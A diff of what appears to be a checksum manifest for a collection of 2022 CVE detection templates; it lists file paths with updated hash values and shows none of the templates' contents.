+http/cves/2022/CVE-2022-28290.yaml:5ada08ecbef0a2b5231b85fa970f6a16460382cb
+http/cves/2022/CVE-2022-28363.yaml:4029716161591834ba2e1194774010681ea5741c
+http/cves/2022/CVE-2022-28365.yaml:b453256f19fe400fc096198742959ef9f20f034c
+http/cves/2022/CVE-2022-2863.yaml:8e570d1e8279d435b20f11a9ee86bd1238b9e24a
+http/cves/2022/CVE-2022-28923.yaml:84f483ab0fad32520087867bd95c781b23477591
+http/cves/2022/CVE-2022-28955.yaml:0eb6a65eda3099c890ff89f09c712afee3acc6a5
+http/cves/2022/CVE-2022-29004.yaml:b2df685e8cb551dcb7acad2fa900acb11beb480f
+http/cves/2022/CVE-2022-29005.yaml:7140a84aa518a978ba1805ddbc86ab7435bfd0b1
+http/cves/2022/CVE-2022-29006.yaml:b909f7782e1b44e1a2ce28f531021dd991a16bf9
+http/cves/2022/CVE-2022-29007.yaml:f70fe5be8e5920c8c61b2ad3ed4728267c299b69
+http/cves/2022/CVE-2022-29009.yaml:1a1ef56c1384d15e7f699228f50c8d6669f7dca8
+http/cves/2022/CVE-2022-29014.yaml:92382385dc5a833f1bc04845bdf4757a93aafb03
+http/cves/2022/CVE-2022-29078.yaml:82a06c8ade69a5e039ea309596aa7bc08ac8f082
+http/cves/2022/CVE-2022-29153.yaml:ff099106f99ba6d56ad557ac42bceef045224680
+http/cves/2022/CVE-2022-29272.yaml:8354508e92cd384324f80ae5fcd3fbbd6e69c4e1
+http/cves/2022/CVE-2022-29298.yaml:a58b73853109ea9249dcef0948d3e06c240d9cdc
+http/cves/2022/CVE-2022-29299.yaml:6b8ea3351ec7e0bf033c7e6fa6052cf686aad72f
+http/cves/2022/CVE-2022-29301.yaml:cf255aab4950375a05aecc82953acc18f210c4bc
+http/cves/2022/CVE-2022-29303.yaml:03acbd4f69cd375696c5d7973e556f1f54ccfd8a
+http/cves/2022/CVE-2022-29349.yaml:f5efee9e6fa265802ab7d1da62ea98bfc1d07c2d
+http/cves/2022/CVE-2022-29383.yaml:dd2944caf1136749fdc05a84d18c9fb43bfc40aa
+http/cves/2022/CVE-2022-29455.yaml:28574e912cac4a50a11f70710978ef9c3eacce93
+http/cves/2022/CVE-2022-29464.yaml:4253425df1549ebf14be3d33ef54f90c94701365
+http/cves/2022/CVE-2022-29548.yaml:5734b275d969e598aee987598418f7b191139c32
+http/cves/2022/CVE-2022-29775.yaml:cd638440682d250a85c8a3493bd7162445c3418f
+http/cves/2022/CVE-2022-30073.yaml:e81bdc9be9253ef8cd37b413a0bd71108bc96a64
+http/cves/2022/CVE-2022-30489.yaml:43cc763dda043192faf2d2cf5465ff919bf7a355
+http/cves/2022/CVE-2022-30512.yaml:7dff1794b7057b9e8b2c17ea439ee329cc93730a
+http/cves/2022/CVE-2022-30513.yaml:20b7f4e74d3488e809742857f784707433ebc642
+http/cves/2022/CVE-2022-30514.yaml:23b1238272eb0f9ee902938f33b830af40e04edf
+http/cves/2022/CVE-2022-30525.yaml:2e1679888443cd8670eef881e78acbfd0f5cc16f
+http/cves/2022/CVE-2022-3062.yaml:7c3796279ed8cf9c068cdff8950f568409513c2a
+http/cves/2022/CVE-2022-30776.yaml:ab9782f374b5751849029ddc9c309f1b0aa7f836
+http/cves/2022/CVE-2022-30777.yaml:c7f89e028577335ac1c5612b146f0270a478ea3d
+http/cves/2022/CVE-2022-31126.yaml:76b68994a7a7e78bd3ba1ae3af60823343bce91b
+http/cves/2022/CVE-2022-31268.yaml:a11d69f3828b5374dd4c5d129f50ef4ac24e189e
+http/cves/2022/CVE-2022-31269.yaml:c112be8d23b42fb842644577d5327f93cc3a2b6a
+http/cves/2022/CVE-2022-31299.yaml:a5da27b2ba84583c92abb2c746e9b242d089fdb0
+http/cves/2022/CVE-2022-31373.yaml:51583037e2acb3777d8bbf17fc1b46268f4a500c
 http/cves/2022/CVE-2022-3142.yaml:b47c40a4977618464295f7048d83e3b664e7b645
-http/cves/2022/CVE-2022-31474.yaml:1819a1a8ba031db6022461ba604f48a0ad4b3591
-http/cves/2022/CVE-2022-31499.yaml:efb75410b3a0d6aa9d7be745fd2e1e299605de7e
-http/cves/2022/CVE-2022-31656.yaml:2049ac1c17e3251701cad52ed1952ee74b6fc89d
-http/cves/2022/CVE-2022-31798.yaml:79f8bc7625f886d221ca97d9f30239dc9dad89ea
-http/cves/2022/CVE-2022-31814.yaml:2ff36f9c7be3fecc1ccc26e91b5c535c276f1260
-http/cves/2022/CVE-2022-31845.yaml:78ebf04245d46c3626bb4b80ddaf18284872ba4d
-http/cves/2022/CVE-2022-31846.yaml:63a957d029da83f61c07690fd13241a4e8f08d7c
-http/cves/2022/CVE-2022-31847.yaml:be0771092533e1e913a6c1c547fd26c98232894c
-http/cves/2022/CVE-2022-31854.yaml:a8dd1dc436f63906930b24a690f4f1d68602b3a1
-http/cves/2022/CVE-2022-31879.yaml:408c25ab1af195489f32351f8e43d36747619a99
-http/cves/2022/CVE-2022-31974.yaml:1c96d2fbe4f89bf48f5158df9b6f890540d5cbc0
-http/cves/2022/CVE-2022-31975.yaml:aa0fb2fa43d3fe741be8b6523cbe86bd776fc7fa
-http/cves/2022/CVE-2022-31976.yaml:00fac0c265f4b78ca8e82d1b43c04707e0b08f5c
-http/cves/2022/CVE-2022-31977.yaml:11435f5601461528a8a3480e8b47c6a33d1d32c6
-http/cves/2022/CVE-2022-31978.yaml:92ea55166cd41818c40eac3b118875e57a68c033
-http/cves/2022/CVE-2022-31980.yaml:15c2a4d59aefd89663e26dfd5ecf4e4c57b427c6
-http/cves/2022/CVE-2022-31981.yaml:09c2743d164198f65325d3038d89168e40234f54
-http/cves/2022/CVE-2022-31982.yaml:f25e5255458a4afa34c22ee569c7288345bfe0c3
-http/cves/2022/CVE-2022-31983.yaml:efa02a9b56a599ce6b529b71a4153bb7f7a3929a
-http/cves/2022/CVE-2022-31984.yaml:cce6239175545055e59660e3e156bb030d3d6bf8
-http/cves/2022/CVE-2022-32007.yaml:16d6febf44ee4483d389b0667afbf417ba72e0fd
+http/cves/2022/CVE-2022-31474.yaml:c45fdfd646e9a3ae2a50ac12b3123b21c120706c
+http/cves/2022/CVE-2022-31499.yaml:cc0314e1e20351e70a2dcd44fde83e57ad50ae35
+http/cves/2022/CVE-2022-31656.yaml:7cd934f996076d883e613bd748dafb6adb245c44
+http/cves/2022/CVE-2022-31798.yaml:ae6712384a78bfb581d2ea2ba7f6756423594b56
+http/cves/2022/CVE-2022-31814.yaml:79ebc87d004a7c61f10f482a4e24719a5ae8c198
+http/cves/2022/CVE-2022-31845.yaml:b3d6084be334357b23a1cefbb53c40d5d7e65829
+http/cves/2022/CVE-2022-31846.yaml:f8ab0a7fee398a9a8a9c7b4b4bf50bcf3eebcc3c
+http/cves/2022/CVE-2022-31847.yaml:fc0eb3f9982eefb499c7f1cdcf21b1c1a037cf57
+http/cves/2022/CVE-2022-31854.yaml:f2c7109c643ec8ff7ad1162c55f79a68caaadda6
+http/cves/2022/CVE-2022-31879.yaml:ff489d086b7d7250feae9507dc3ae92fd80d37c5
+http/cves/2022/CVE-2022-31974.yaml:22b9081fe83d92f7183b414540d7d92e831e9ccb
+http/cves/2022/CVE-2022-31975.yaml:9b82f9ab7282bd8f44cd5496f99879d3bbbf913e
+http/cves/2022/CVE-2022-31976.yaml:3ded0b1d17b42a6765c2bec8db8e1dfc89280aa2
+http/cves/2022/CVE-2022-31977.yaml:332fb4518f63af317c5a5836871840b4ba223379
+http/cves/2022/CVE-2022-31978.yaml:9fb6dc76dd7b59efb7d96d7b23e12cb94d1a12d2
+http/cves/2022/CVE-2022-31980.yaml:de6792c8025bdf1b640dda51c8190c80a458646f
+http/cves/2022/CVE-2022-31981.yaml:240284c768b8218fb1176e9f39f6c7d5df97735d
+http/cves/2022/CVE-2022-31982.yaml:c37a8168b08b034a71090fbe9e6792f539b667c8
+http/cves/2022/CVE-2022-31983.yaml:ac7b818723c83d6fc1de8e07694495ee8f7a0b32
+http/cves/2022/CVE-2022-31984.yaml:9249ad21d63cf563370ca6338e9964da5791313f
+http/cves/2022/CVE-2022-32007.yaml:0fe85adfcc5446f72b039ffeeedb290b28f0d64c
 http/cves/2022/CVE-2022-32015.yaml:e5cb104b53fcbc4f66826415280411c55ac29b42
-http/cves/2022/CVE-2022-32018.yaml:732bc47b14d2b42a61de769a2bdc8e41643fd5a8
-http/cves/2022/CVE-2022-32022.yaml:ed74135869fc7be8d9c1051b906b42b17f67c3c9
-http/cves/2022/CVE-2022-32024.yaml:ceccc12c8d9edd04f78dae595653fad7d491af25
-http/cves/2022/CVE-2022-32025.yaml:804ec7339622823ac617085750daf11fb6c98fbd
-http/cves/2022/CVE-2022-32026.yaml:075f6dc050b0cc754d738cb63c383259c6a4f4fe
-http/cves/2022/CVE-2022-32028.yaml:751b42040482ff3bbe412a97d92d1f1c7a525d27
-http/cves/2022/CVE-2022-32094.yaml:be07bc3d18290c1dce4790a5800e466efcf48346
-http/cves/2022/CVE-2022-32195.yaml:8d793c357dd3f90c4af9d54609270c2f3b66ecea
-http/cves/2022/CVE-2022-32409.yaml:4a1c6976e6b802d61d5585a4bb9162dc612df173
+http/cves/2022/CVE-2022-32018.yaml:63878c0ec759d952c406025dea8f259d689e51d4
+http/cves/2022/CVE-2022-32022.yaml:318df65abc95f8dd520278b16314f6399a62674e
+http/cves/2022/CVE-2022-32024.yaml:b3567e675dcc9644daaaedefe01d12c47eb2b0ab
+http/cves/2022/CVE-2022-32025.yaml:97e4870d18cd9eea6f47c6d1649b969574fa8e3d
+http/cves/2022/CVE-2022-32026.yaml:2eee7fc9a32b7249a6730bea81e99042517aaced
+http/cves/2022/CVE-2022-32028.yaml:58eb20ba5785465474253ce94921200196adfab9
+http/cves/2022/CVE-2022-32094.yaml:8445fa3d80e0c7b0ce88cb6e4c2e85d7966490b7
+http/cves/2022/CVE-2022-32195.yaml:8dbe74a49e1d0212da5dddbc686c233bdc33239e
+http/cves/2022/CVE-2022-32409.yaml:25d86cb19dff9722420f3420fd9bfd352400c965
 http/cves/2022/CVE-2022-3242.yaml:5dab05bf6ff4b2f75131be1e996bf11f71e32c61
-http/cves/2022/CVE-2022-32429.yaml:1715cadd8b1be29c510591cc499cc9e81e3dc7b0
-http/cves/2022/CVE-2022-32444.yaml:1b2fe7ee133c5031ecd2e630869438197053034d
-http/cves/2022/CVE-2022-32770.yaml:31bd5a5f43e30c4090aa1009ad06cac8f4483a87
-http/cves/2022/CVE-2022-32771.yaml:e91cf83c6b1e40bb4213cd684752e73e4258a52b
-http/cves/2022/CVE-2022-32772.yaml:ee6c321edaae20122c18b7f37caf5c85c9d224cd
-http/cves/2022/CVE-2022-33119.yaml:0f7102b581147e5a6e4efd98109ee0bb56d7138f
-http/cves/2022/CVE-2022-33174.yaml:f1be23bbe5b92d43cd526ae920e6ac8f20c8d424
-http/cves/2022/CVE-2022-33891.yaml:48e299fccdc3c48f701ab2a4ee65440a85c1737e
-http/cves/2022/CVE-2022-33901.yaml:0009a7c5b222d3f919de88565b892d26c4be3c0c
-http/cves/2022/CVE-2022-33965.yaml:c28db075e4fa03ab469e69adee5989ea602ccc9f
-http/cves/2022/CVE-2022-34045.yaml:2da7791f9275fee578e5b392b02a7d4d4ed64be9
-http/cves/2022/CVE-2022-34046.yaml:e8b27d846a03b0ddb41fda953a562cbdff2307ea
-http/cves/2022/CVE-2022-34047.yaml:e367bfbb26beabfd3c85a6cd495c04c8a1f8d971
-http/cves/2022/CVE-2022-34048.yaml:02111e1499c8b525528e9364201b63b237a4647f
-http/cves/2022/CVE-2022-34049.yaml:0bc1fdaa53da8fc27dbbf6197d37ed7667613dfa
+http/cves/2022/CVE-2022-32429.yaml:c61fcbcb72d151ad955905cd794f86e040109100
+http/cves/2022/CVE-2022-32444.yaml:b592e7c5c34207c284cc495a5f36e93012f41952
+http/cves/2022/CVE-2022-32770.yaml:cdd3062dae48eb92be723eeb4a109693cf6120c1
+http/cves/2022/CVE-2022-32771.yaml:b1ff18daa6bdc9928427cce569304ad5fe09ed53
+http/cves/2022/CVE-2022-32772.yaml:6dbd3792496ea08d9a9ee2f4cf9db15b89a087bd
+http/cves/2022/CVE-2022-33119.yaml:5fee4da54f6b4909a4fae153d4cb3bcd333ea6f1
+http/cves/2022/CVE-2022-33174.yaml:a4543844943492f2b13bbf52105a4e35d393dfc4
+http/cves/2022/CVE-2022-33891.yaml:e57e0c0c212ad6a1cdad5baeee7d1ccfdd485e28
+http/cves/2022/CVE-2022-33901.yaml:eed416af43edd370bdbde3f07a2fec9d7c53a7c8
+http/cves/2022/CVE-2022-33965.yaml:ed00cf72d40db9b30ef80b87b6341e7b654d3842
+http/cves/2022/CVE-2022-34045.yaml:bb5e8f4a145650da7cb438a41f1fbd9e087b9805
+http/cves/2022/CVE-2022-34046.yaml:6e63b0bbcdc44f69bce7ea291ca2eb6de16b8df5
+http/cves/2022/CVE-2022-34047.yaml:75d9e488889c4dd29e9217fe1fa498a19f225e4e
+http/cves/2022/CVE-2022-34048.yaml:033dac9328d06e507c3c58f930e239d5b9ba1d4e
+http/cves/2022/CVE-2022-34049.yaml:3fa7b36830966ccc3cfafd28832c19375666c16f
 http/cves/2022/CVE-2022-34093.yaml:985ffd1baffac96dead386d76ce462639526a0fb
 http/cves/2022/CVE-2022-34094.yaml:17319d4f68228792081f8156bf92ebd4c3500ef4
-http/cves/2022/CVE-2022-34121.yaml:9709c4cb777947309b68421f96f88e631bf81bfc
-http/cves/2022/CVE-2022-34328.yaml:17fb6e706042016e2a29bb5dedb21e7ec56a7312
-http/cves/2022/CVE-2022-34576.yaml:854f98fdf8359e171cf8bbbc6a3192cf89cc2f44
-http/cves/2022/CVE-2022-34590.yaml:cee753074822b0e98de011a1e8a364c2945bf425
-http/cves/2022/CVE-2022-34753.yaml:a8d513851201b31414a34af1c5e3b5913616e624
-http/cves/2022/CVE-2022-3484.yaml:eba09b0f4562e70c733d39e64d2c8be112027172
-http/cves/2022/CVE-2022-3506.yaml:24a78c75e72d8dab3f1d3a19e4698c0a1f7a6665
-http/cves/2022/CVE-2022-35151.yaml:f857eab0d574bc22548494e57462e84e20ac2622
-http/cves/2022/CVE-2022-35405.yaml:9c058910d7a2066a32fa9aec965b2eae1803baa5
-http/cves/2022/CVE-2022-35413.yaml:c7a87342867a77e5d37c21f04669d4481edb43b6
-http/cves/2022/CVE-2022-35416.yaml:68d04ab42be9dd9f817364bcbe5ceafed510e3b1
-http/cves/2022/CVE-2022-35493.yaml:619324136d33a31d1ff42a658f049383508d0e43
+http/cves/2022/CVE-2022-34121.yaml:4675129bc364586a8ea40b0645535e7970a09e7f
+http/cves/2022/CVE-2022-34328.yaml:18f9305e87ccb124e87cb112918c366e9529a44e
+http/cves/2022/CVE-2022-34576.yaml:bdc3fbbd2c3a8de8086a193cf3717daba210700a
+http/cves/2022/CVE-2022-34590.yaml:62d4954db18b2fa748f78add85fd9218fa797853
+http/cves/2022/CVE-2022-34753.yaml:10714ad183339f3f6907b9322e75d24425c50453
+http/cves/2022/CVE-2022-3484.yaml:53eb540be0e73e9b01add7d5d0a11a6205ccc469
+http/cves/2022/CVE-2022-3506.yaml:ca6e26d9dfdf12cf3fde414ea03e4b813ac2a7d7
+http/cves/2022/CVE-2022-35151.yaml:04ed7320dc3b72b3179f0d53390e516bd3bfd573
+http/cves/2022/CVE-2022-35405.yaml:c784386bf6dfbc389c1457765f31d1c21594cea9
+http/cves/2022/CVE-2022-35413.yaml:2655bd781272f7c6429758df7bc90e3581c2583e
+http/cves/2022/CVE-2022-35416.yaml:506f002a91af290204065a58ae6555abbf79c32f
+http/cves/2022/CVE-2022-35493.yaml:37ed81d2c20d2ea95d47b3d69df9d89d4091e7f9
 http/cves/2022/CVE-2022-35653.yaml:90680e5de58fbc4997362fe43985fd579bb6dd70
-http/cves/2022/CVE-2022-3578.yaml:612ec234124e33307b09ee0d66074ff098e97903
-http/cves/2022/CVE-2022-35914.yaml:87d4a3094e096f143feb4448b3d6d05ced17290b
-http/cves/2022/CVE-2022-36446.yaml:8ba0580edca429127d737df24fad9b568ccd6c25
-http/cves/2022/CVE-2022-36537.yaml:4278fc9e6c83f7e1c91ccee4fac4f8f80ef4f229
+http/cves/2022/CVE-2022-3578.yaml:51ed52449207d5b105fc8e3a75ab7332e7948399
+http/cves/2022/CVE-2022-35914.yaml:6828ab8c4fa34cd17bea49e585488bc46badbdcc
+http/cves/2022/CVE-2022-36446.yaml:96e21be1048facfaa5b80c011710cf5f072cd048
+http/cves/2022/CVE-2022-36537.yaml:d6c485da07d4120d2e4317afd43aabdf79ab3825
 http/cves/2022/CVE-2022-36553.yaml:17e0366e8d6e447da87a639f990795a356e8abd8
-http/cves/2022/CVE-2022-36642.yaml:7a7319c75b0a88e246cf623d748136f510213585
-http/cves/2022/CVE-2022-36804.yaml:dd75cdee99fdb3b80acb13f0c63b7045886b48b7
-http/cves/2022/CVE-2022-36883.yaml:ce3df573f4f55c82259f4eae5126f603bf7178a4
+http/cves/2022/CVE-2022-36642.yaml:61f1f35f9b504a2e378e38561e50885321e78965
+http/cves/2022/CVE-2022-36804.yaml:dadbe3aa8daf5ec701d479860b904811a70319f5
+http/cves/2022/CVE-2022-36883.yaml:aab86bb95bc084d70262eb131000e37387e0ad63
 http/cves/2022/CVE-2022-37042.yaml:c7659f729495c0b965290d69423f0ed0e778c220
 http/cves/2022/CVE-2022-37153.yaml:59f0bff86c996e44523339a90c727fa2e7385a98
-http/cves/2022/CVE-2022-37190.yaml:ca4280fe9e13bc92f53c9135e44c532cf085c6ad
-http/cves/2022/CVE-2022-37191.yaml:9ff6c5e8ffc6ec0f558e95e0175a3982434d673c
-http/cves/2022/CVE-2022-37299.yaml:50229ce70b36de2a3cfad5885ea5065ce7825f61
-http/cves/2022/CVE-2022-3768.yaml:2e9bc3c67228785edcb553fc327fb651c578cc5b
-http/cves/2022/CVE-2022-3800.yaml:09fc50e0b75f402f5603902a1f56a095a69b343c
-http/cves/2022/CVE-2022-38295.yaml:8c86bfb70639b4c6d68c8335fa0002c8723772ec
-http/cves/2022/CVE-2022-38296.yaml:d38e99b3860cd689dbc3ea25b9e71ed479139c5f
-http/cves/2022/CVE-2022-38463.yaml:8d71b3d2f3fb97fa611d615e1ef9bff461ac85e2
-http/cves/2022/CVE-2022-38467.yaml:02ca2bf164b3e9e44d6bdbead4a6d78f30964121
-http/cves/2022/CVE-2022-38553.yaml:c927c73a491187d2a516dcfe47ce2531bfbd11a5
-http/cves/2022/CVE-2022-38637.yaml:e9b7e6cfa288ae7f25d520fb9e36d843d038427a
-http/cves/2022/CVE-2022-38794.yaml:81a0116d58aadd470f5e5784b03b60ff84037717
-http/cves/2022/CVE-2022-38817.yaml:e0b2dedb35ac0083290fde3bd8388cc74550380c
-http/cves/2022/CVE-2022-38870.yaml:c5067734b69d0de00ecfd06e5b9bba8c09313c35
+http/cves/2022/CVE-2022-37190.yaml:8b1e194c1d3ba7f2cd7141c7aa754ca49f2a6383
+http/cves/2022/CVE-2022-37191.yaml:e4a00fd9172b9cba051602aef3ac8576d7d04ef8
+http/cves/2022/CVE-2022-37299.yaml:3f957e2b712d08d23b45010c8db37c9100e192cb
+http/cves/2022/CVE-2022-3768.yaml:a32dd2e05f6862e7106f273d9efe2dfd198e39de
+http/cves/2022/CVE-2022-3800.yaml:22a4a049a618e162566beeb20c8a5d211750673c
+http/cves/2022/CVE-2022-38295.yaml:5fa3fa7eea2f73d721bb9ad5ea6d50afc70a0b1e
+http/cves/2022/CVE-2022-38296.yaml:1f31cc2c06e936ce423f39e76260082b64ac4276
+http/cves/2022/CVE-2022-38463.yaml:7f14940c77fc930b1c9df3212589d06d14f17465
+http/cves/2022/CVE-2022-38467.yaml:0c6f6de25f5bf1323c35ec5a9b6271d53aa9a2b3
+http/cves/2022/CVE-2022-38553.yaml:8ac301b7c000c18f4d70fe34ad4bc201ea017f33
+http/cves/2022/CVE-2022-38637.yaml:0945eaa4002db4b47a3944b89bb42cee9e88eead
+http/cves/2022/CVE-2022-38794.yaml:7ba5782e9e032ec618500ad1912789f5392b5687
+http/cves/2022/CVE-2022-38817.yaml:739b701c5c94e8d1ee78ab5d8b73a6aa096078e4
+http/cves/2022/CVE-2022-38870.yaml:0acd85637020aa19f00c7296dbad1a5afab97720
 http/cves/2022/CVE-2022-39048.yaml:9e94356d8b9fa9c766d6f7670149c537def3d0ce
-http/cves/2022/CVE-2022-3908.yaml:9a9949dcf575277e8c2acc84033c365af08847f1
-http/cves/2022/CVE-2022-39195.yaml:31794b70b78d7ed629f9f8eec58d4009e233610b
-http/cves/2022/CVE-2022-3933.yaml:34ecc07a7b9628e15fd87c13baee6b030595aa99
-http/cves/2022/CVE-2022-3934.yaml:794b4b442b377dfed524e6f259f5ab4b0746d793
-http/cves/2022/CVE-2022-3980.yaml:d5a9957f8a689fc92f27016b30d8800fbc5c8f07
-http/cves/2022/CVE-2022-3982.yaml:9d36cdf91968fb5fa02b92afa61f74ea4be64c14
-http/cves/2022/CVE-2022-39952.yaml:2a9d5f9f1c7c2c3533ea0cfd5784724bc89f4c35
-http/cves/2022/CVE-2022-39960.yaml:ec5416bb3e795b9f9ef7dac4782dc16fd3625271
-http/cves/2022/CVE-2022-39986.yaml:34fc63087d015a8bd76d664a272fffe88d562564
-http/cves/2022/CVE-2022-40022.yaml:13b82a0b932869421e9a60101098101cfa6289b2
+http/cves/2022/CVE-2022-3908.yaml:a7cc61da97c355002d6f650d984be5b5c11d522b
+http/cves/2022/CVE-2022-39195.yaml:d7a32dca1d7254efd63287b6dc1283ef61801dc3
+http/cves/2022/CVE-2022-3933.yaml:1ac770ffbd89454ec1664a9fc6bbe20657912778
+http/cves/2022/CVE-2022-3934.yaml:ddc37bff145848070c38c2c6b6f0a90be7a8c661
+http/cves/2022/CVE-2022-3980.yaml:580da25e71283eac86d0a0a12bdb3dbd477cbb9f
+http/cves/2022/CVE-2022-3982.yaml:345093f8d96119cd78c4603143506f708dcd16c1
+http/cves/2022/CVE-2022-39952.yaml:17dbb7a66db213fedd98c9761a87d6a39190b1e9
+http/cves/2022/CVE-2022-39960.yaml:1a46e33e0f792b4dfee38aacd0640fa171e9f10e
+http/cves/2022/CVE-2022-39986.yaml:9922010867fae7469da52c4e58f8a353f9d53a7b
+http/cves/2022/CVE-2022-40022.yaml:f6403bf01be46ae5fed89f34baeeb91dc4df70df
 http/cves/2022/CVE-2022-40032.yaml:672131f27b6a29a2b8ffcbbd6c5c08b75cc2b352
 http/cves/2022/CVE-2022-40047.yaml:5f200693ddfc038ac3bccaae47fb207592ab4812
-http/cves/2022/CVE-2022-40083.yaml:c3e0f5585cf4f4c83fd44ecc50374dde60a9fab5
-http/cves/2022/CVE-2022-40127.yaml:1c782efa8523a42143310ae73d19a95c47a915b7
-http/cves/2022/CVE-2022-40359.yaml:9c2da6bb22d88b8e13d315ac778ee77416f7b9f8
+http/cves/2022/CVE-2022-40083.yaml:f6ce9f10fd5486fc917a0e1ae9717b2bc17512e2
+http/cves/2022/CVE-2022-40127.yaml:951de3c798d5d898642bdfcd4427218e3f9a91b1
+http/cves/2022/CVE-2022-40359.yaml:2fe11a60e87efabdf42ee5210d9438eb569f29bf
 http/cves/2022/CVE-2022-4049.yaml:0ae79ff39013f7312de104702ad59f1f0db275f0
-http/cves/2022/CVE-2022-4050.yaml:c7a9dce289e7e2b69eb56a4d8cceaba3a3270733
-http/cves/2022/CVE-2022-4057.yaml:34c3940d8aa0873706c26a7be87bba4d63feb167
+http/cves/2022/CVE-2022-4050.yaml:7a5799969b4a1044dc8fbd04f8204f769176d2ff
+http/cves/2022/CVE-2022-4057.yaml:e2f999a6fb55f1a9284162d1469f9c27b4cb5120
 http/cves/2022/CVE-2022-4059.yaml:7a78075ff445469219cb170440e08be77844720c
-http/cves/2022/CVE-2022-4060.yaml:d907c75ddd227ca69fe8b8bf794a9caf9c86defb
-http/cves/2022/CVE-2022-4063.yaml:a2d28eef785c6f1053694abe6b499243d54964f2
-http/cves/2022/CVE-2022-40684.yaml:d7fd01b8eb905cac7b8057ff572f56a4c9ae9067
-http/cves/2022/CVE-2022-40734.yaml:f3773aee1492137577fdde8c481b692789d2405d
-http/cves/2022/CVE-2022-40843.yaml:2762f6edd13e55c3438aef27e205d2e58e52dbd7
-http/cves/2022/CVE-2022-40879.yaml:2d0cb9b1d9a8a213ae0d5e660d3070573c4c0262
-http/cves/2022/CVE-2022-40881.yaml:4800673093ee5135750feb05213343c41194f466
-http/cves/2022/CVE-2022-4117.yaml:3d39bbd4a71515cbdd4fc6c6d3bb4a0b1b305266
-http/cves/2022/CVE-2022-4140.yaml:e78b6187e703a06f7ed1e66c8e912d2d4097d88a
-http/cves/2022/CVE-2022-41441.yaml:7f42647866c9b72a45f299390f951d845333d754
-http/cves/2022/CVE-2022-41473.yaml:586a5d695f582a9404f82465a6ac182e1b382441
-http/cves/2022/CVE-2022-41840.yaml:f6f1f5006433b37877ecf370f9c5a9d503427180
-http/cves/2022/CVE-2022-42094.yaml:92eba7ed5b78b72ffb33ac3f3ea2b6c1861f7850
-http/cves/2022/CVE-2022-42095.yaml:9af3a64652bd68d2b0cfda4aa7894dd51a3f9f6b
+http/cves/2022/CVE-2022-4060.yaml:111ede45a0da0cf99b7c746cb40814ca16b5f21f
+http/cves/2022/CVE-2022-4063.yaml:47b63d6b7a2351a32659e4671f4173b80f5196a7
+http/cves/2022/CVE-2022-40684.yaml:d8e7a6bbb029da956b134aa09fbdff84b5a6d34c
+http/cves/2022/CVE-2022-40734.yaml:ac5410ae4f4f453980a5a3fe8cf3a96fda0abbbd
+http/cves/2022/CVE-2022-40843.yaml:360c9899595a0d57caf3167543e6ee102038e1f6
+http/cves/2022/CVE-2022-40879.yaml:b861d36aa7f8c3ca347aa01c19f60467ea04b6fe
+http/cves/2022/CVE-2022-40881.yaml:b0f9fd730267bee66e0c58be42ef3815d4126c69
+http/cves/2022/CVE-2022-4117.yaml:528e736c2a77aa0427595d62ce5034d246700705
+http/cves/2022/CVE-2022-4140.yaml:8cf021677dc220838abb92cb623e53f96317ee4e
+http/cves/2022/CVE-2022-41441.yaml:a2de2abae965bbe72edd098ec817411ed77d39ce
+http/cves/2022/CVE-2022-41473.yaml:073872f10d413db6fd7b4bb91f6db7b51c9d1b59
+http/cves/2022/CVE-2022-41840.yaml:819d15aa48debd6a9cbc86ab72e6121c574eecff
+http/cves/2022/CVE-2022-42094.yaml:ad66509367d6917a4b2a029fc83c9f8d84a28cec
+http/cves/2022/CVE-2022-42095.yaml:9ec5f3e391e5f804cdc353f278bc3f925f29bba9
 http/cves/2022/CVE-2022-42096.yaml:8eeeeeaacd42509921f4bcd6e56411d59cdcdb89
 http/cves/2022/CVE-2022-42233.yaml:b66eb1356d95fe36eb58b3f06411bdb2d38614ff
-http/cves/2022/CVE-2022-4260.yaml:453864e3428270f89dffdc1b119f8100331fc154
-http/cves/2022/CVE-2022-42746.yaml:5f38ace9735998c0119ff095958267fcd9fffc68
-http/cves/2022/CVE-2022-42747.yaml:a56a6392140c1dd89634a4d8ee6ff28655299ed3
-http/cves/2022/CVE-2022-42748.yaml:a4e5e68d7e0396702dac06ea63b0278c24cab054
-http/cves/2022/CVE-2022-42749.yaml:eb05643198e958bdcf0a1d275745a845a0b9f7fc
-http/cves/2022/CVE-2022-4295.yaml:4db59bbc0e89f4d1f00b602ec40c1ba8a32aaa03
-http/cves/2022/CVE-2022-4301.yaml:4fd2028434c9cd00e813f45b05248cb9be79b96a
-http/cves/2022/CVE-2022-43014.yaml:1e679cb96ab90125a05bfa188a9cc9f56be521d5
-http/cves/2022/CVE-2022-43015.yaml:61221c05fddfd7c8262789dea4573abbc4792592
-http/cves/2022/CVE-2022-43016.yaml:1dc8767d03c5ffc5a02c9bd32060444db16ba973
-http/cves/2022/CVE-2022-43017.yaml:80bc56c0ed43bda4dd05ed9a621338a9d9f583ba
+http/cves/2022/CVE-2022-4260.yaml:a11d3374d3e9bf9e287ed46fa35c9cca5250896d
+http/cves/2022/CVE-2022-42746.yaml:dde8373b1f18467def2e69ee8fcc3e80876eb46c
+http/cves/2022/CVE-2022-42747.yaml:ad96bc99cd03fbfa0bfc4b57aeebebd8f121917e
+http/cves/2022/CVE-2022-42748.yaml:0e52bd24a7e211a039ea70cc249d12a57ceb2d14
+http/cves/2022/CVE-2022-42749.yaml:076ae9a7d7afd602dcdd91110a80f156a541864e
+http/cves/2022/CVE-2022-4295.yaml:73e6438dc1088248a639a5495e7999986da1d15b
+http/cves/2022/CVE-2022-4301.yaml:08e870be25f7f60e19f62ab0bdc8231a4c90c034
+http/cves/2022/CVE-2022-43014.yaml:eb06d6ed71da26db84e19837d55d433952bc666f
+http/cves/2022/CVE-2022-43015.yaml:a0f9c77e8af5334d1a45e2246f6c453a4020e395
+http/cves/2022/CVE-2022-43016.yaml:89131dcc0af7b0aa9801b18304b8ab71b94c7a76
+http/cves/2022/CVE-2022-43017.yaml:171be45723594ada348c74fe69a249832d88b38e
 http/cves/2022/CVE-2022-43018.yaml:73a92ab04757bc94470a1b26343b5263ea78baa1
 http/cves/2022/CVE-2022-4305.yaml:f94a680e08063c4b04e745bc0553afbade936328
-http/cves/2022/CVE-2022-4306.yaml:134ea21a99634edf26bad778d15a140212cc4bee
-http/cves/2022/CVE-2022-43140.yaml:fdfe9dce28e1e0c035c35abaf5e4577375326bff
-http/cves/2022/CVE-2022-43164.yaml:bfb29755a1e735866b890a5324288d38a1c4a417
-http/cves/2022/CVE-2022-43165.yaml:2f0395bdcd7d4c7718f1f1c3b7b6d0aac61108a5
-http/cves/2022/CVE-2022-43166.yaml:95b7266c08a90348a3908c060a5eac6b0bf19338
